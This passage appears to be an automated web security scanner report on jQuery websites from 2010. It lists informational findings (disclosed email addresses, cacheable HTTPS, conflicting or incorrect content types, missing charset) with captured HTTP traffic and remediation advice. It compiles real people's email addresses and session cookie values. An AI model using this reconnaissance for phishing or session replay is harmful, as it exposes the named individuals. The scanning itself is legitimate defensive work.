http://forum.jquery.com/jquery-conferences/feed
http://forum.jquery.com/user/jeresig
http://forum.jquery.com/user/malsup
http://forum.jquery.com/user/wycats
http://plugins.jquery.com/sites/all/themes/jquery/js/jquery-plugins.js
http://static.jquery.com/files/rocker/scripts/custom.js
http://static.jquery.com/jobs.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

8.1. http://forum.jquery.com/developing-jquery-mobile/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile/feed

Issue detail

The following email address was disclosed in the response:

todd@filamentgroup.com

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=42A9B18DCA94367EB89AE1F90A3E8A5E; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:31 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...
<a href='mailto:todd@filamentgroup.com' target='_blank'>todd@filamentgroup.com</a>
...[SNIP]...

8.2. http://forum.jquery.com/jquery-conferences/feed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-conferences/feed

Issue detail

The following email address was disclosed in the response:

bn.reinhart@gmail.com

Request

Response

8.3. http://forum.jquery.com/user/jeresig previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The following email addresses were disclosed in the response:

jeresig@gmail.com
uno@biyubi.com

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:01 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href='mailto:uno@biyubi.com' target='_blank'>uno@biyubi.com</a>
...[SNIP]...
<a href='mailto:jeresig@gmail.com' target='_blank'>jeresig@gmail.com</a>
...[SNIP]...

8.4. http://forum.jquery.com/user/malsup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/malsup

Issue detail

The following email addresses were disclosed in the response:

Jquery-dev@bassistance.de
discuss@jquery.com

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:23:18 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:Jquery-dev@bassistance.de' target='_blank'>Jquery-dev@bassistance.de</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:Jquery-dev@bassistance.de' target='_blank'>Jquery-dev@bassistance.de</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...

8.5. http://forum.jquery.com/user/wycats previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The following email address was disclosed in the response:

discuss@jquery.com

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:10 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...
<a href='mailto:discuss@jquery.com' target='_blank'>discuss@jquery.com</a>
...[SNIP]...

8.6. http://plugins.jquery.com/sites/all/themes/jquery/js/jquery-plugins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://plugins.jquery.com
Path:	/sites/all/themes/jquery/js/jquery-plugins.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com
todd@filamentgroup.com

Request

GET /sites/all/themes/jquery/js/jquery-plugins.js?f HTTP/1.1
Accept: */*
Referer: http://plugins.jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: plugins.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.2.10.1289872970; __utmc=44433727; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSabdcf03bfc020aa07e9f024d8c52c72f=uh580qfuh5d3titc2noqj80hu3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 18 Aug 2009 22:41:44 GMT
ETag: "5780c00-2948-3909da00"
Accept-Ranges: bytes
Content-Length: 10568
Cache-Control: max-age=1209600
Expires: Tue, 30 Nov 2010 02:23:37 GMT
Connection: close
Content-Type: application/x-javascript

//jQuery Plugin: Drop Shadow Text
// call like this: $(element).textDropShadow();
(function($) {
$.fn.textDropShadow = function(){
    $(this).html('<span class="jq-shadow">'+$(this).html()+'</span><sp
...[SNIP]...
$(this).removeClass('hover');
       }
       );
   });
}

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p,a,c,k
...[SNIP]...
title', '* This link opens in a new window');
   return jQuery(this);
}

/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights"
* by:
Scott Jehl (scott@filamentgroup.com)
Todd Parker (todd@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2007 Filament Group
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Description: Compares the heights of the first
...[SNIP]...

8.7. http://static.jquery.com/files/rocker/scripts/custom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.jquery.com
Path:	/files/rocker/scripts/custom.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com
todd@filamentgroup.com

Request

GET /files/rocker/scripts/custom.js HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: static.jquery.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 16 Nov 2010 02:24:45 GMT
ETag: "9ed053a-2948-3909da00+gzip"
Last-Modified: Tue, 18 Aug 2009 22:41:44 GMT
Server: ECS (dfw/562C)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 10568

//jQuery Plugin: Drop Shadow Text
// call like this: $(element).textDropShadow();
(function($) {
$.fn.textDropShadow = function(){
    $(this).html('<span class="jq-shadow">'+$(this).html()+'</span><sp
...[SNIP]...
$(this).removeClass('hover');
       }
       );
   });
}

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*/
eval(function(p,a,c,k
...[SNIP]...
title', '* This link opens in a new window');
   return jQuery(this);
}

/*--------------------------------------------------------------------
* JQuery Plugin: "EqualHeights"
* by:
Scott Jehl (scott@filamentgroup.com)
Todd Parker (todd@filamentgroup.com)
http://www.filamentgroup.com
*
* Copyright (c) 2007 Filament Group
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Description: Compares the heights of the first
...[SNIP]...

8.8. http://static.jquery.com/jobs.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.jquery.com
Path:	/jobs.js

Issue detail

The following email address was disclosed in the response:

recruiting@schematic.com

Request

GET /jobs.js HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: static.jquery.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 16 Nov 2010 02:24:52 GMT
ETag: "9e685c4-3235-527c9000+gzip"
Last-Modified: Mon, 28 Sep 2009 21:53:04 GMT
Server: ECS (dfw/566D)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 12853

var jobs = [{"id":"741","type_id":"3","category_id":"1","category_name":"Developers","company":"Schematic","url":"http:\/\/www.schematic.com","title":"Freelance Sr. Front End Developer","url_title":"f
...[SNIP]...
r experience designers, interface designers, other technologists, and client representatives from a similarly broad range of disciplines are an absolute must.\r\n\r\nPlease apply by sending your CV to recruiting@schematic.com , using a subject heading of \"Freelance Senior IEG Front End Developer LA.\" Please include a cover letter outlining your hourly rate, skills and experience, and indicate the two URLs that you feel
...[SNIP]...

8.9. http://static.jquery.com/ui/themeroller/scripts/app.js previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.jquery.com
Path:	/ui/themeroller/scripts/app.js

Issue detail

The following email address was disclosed in the response:

tzury.by@gmail.com

Request

GET /ui/themeroller/scripts/app.js HTTP/1.1
Accept: */*
Referer: http://jqueryui.com/themeroller/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: static.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utmc=44433727

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 16 Nov 2010 02:25:02 GMT
ETag: "9ed01be-5c75-45142080+gzip"
Last-Modified: Tue, 18 Aug 2009 22:45:06 GMT
Server: ECS (dfw/5631)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 23669

//add js to html element for css selectors
document.documentElement.className = 'js';

//global - TR app or bookmarklet
var bookmarklet = window.location.href.indexOf('developertool') > -1;

/
...[SNIP]...

* @ Original idea by by Binny V A, Original version: 2.00.A
* @ http://www.openjs.com/scripts/events/keyboard_shortcuts/
* @ Original License : BSD

* @ jQuery Plugin by Tzury Bar Yochay
mail: tzury.by@gmail.com
blog: evalinux.wordpress.com
face: facebook.com/profile.php?id=513676303

(c) Copyrights 2007

* @ jQuery Plugin version Beta (0.0.2)
* @ License: jQuery-License.

TODO:
add queue support (a
...[SNIP]...

9. Cacheable HTTPS response previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://accounts.zoho.com
Path:	/login

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

Request

Response

10. Multiple content types specified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile/feed

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Content-Type: Text/Xml;charset=UTF-8
text/html; charset=UTF-8

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=42A9B18DCA94367EB89AE1F90A3E8A5E; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:33:31 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...
<div><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Style-Type" content="text/css">
...[SNIP]...
</div><meta http-equiv="content-type" content="text/html; charset=UTF-8">]]>
...[SNIP]...

11. HTML does not specify charset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/_rollyourown.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /themeroller/_rollyourown.php HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=77982607.1289873280.2.2.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=77982607.681325185.1289872991.1289872991.1289873280.2; __utmc=77982607; __utmb=77982607.5.10.1289873280;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 02:34:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 37805


<a href="/download?themeParams=" id="downloadTheme" class="corner-all"><span class="icon"></span><strong>Download</strong> theme</a>

<form method="get" action="/"
...[SNIP]...

12. Content type incorrectly stated previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bugs.jquery.com
Path:	/search/opensearch

Issue detail

The response contains the following Content-type statement:

Content-Type: application/opensearchdescription+xml;charset=utf-8

The response states that it contains script. However, it actually appears to contain XML.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /search/opensearch HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: bugs.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); trac_session=ef3b3632c1eb2698d8a6210a; __utma=119074714.56097933.1289873044.1289873044.1289873044.1; __utmb=119074714.1.10.1289873044; __utmz=119074714.1289873044.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 Ok
Server: nginx/0.7.65
Date: Tue, 16 Nov 2010 02:23:38 GMT
Content-Type: application/opensearchdescription+xml;charset=utf-8
Connection: keep-alive
Cache-Control: must-revalidate
Content-Length: 408

<?xml version="1.0"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Search jQuery Core</ShortName>
<InputEncoding>UTF-8</InputEncoding>
<Image width="16" height
...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 20:46:53 CST 2010.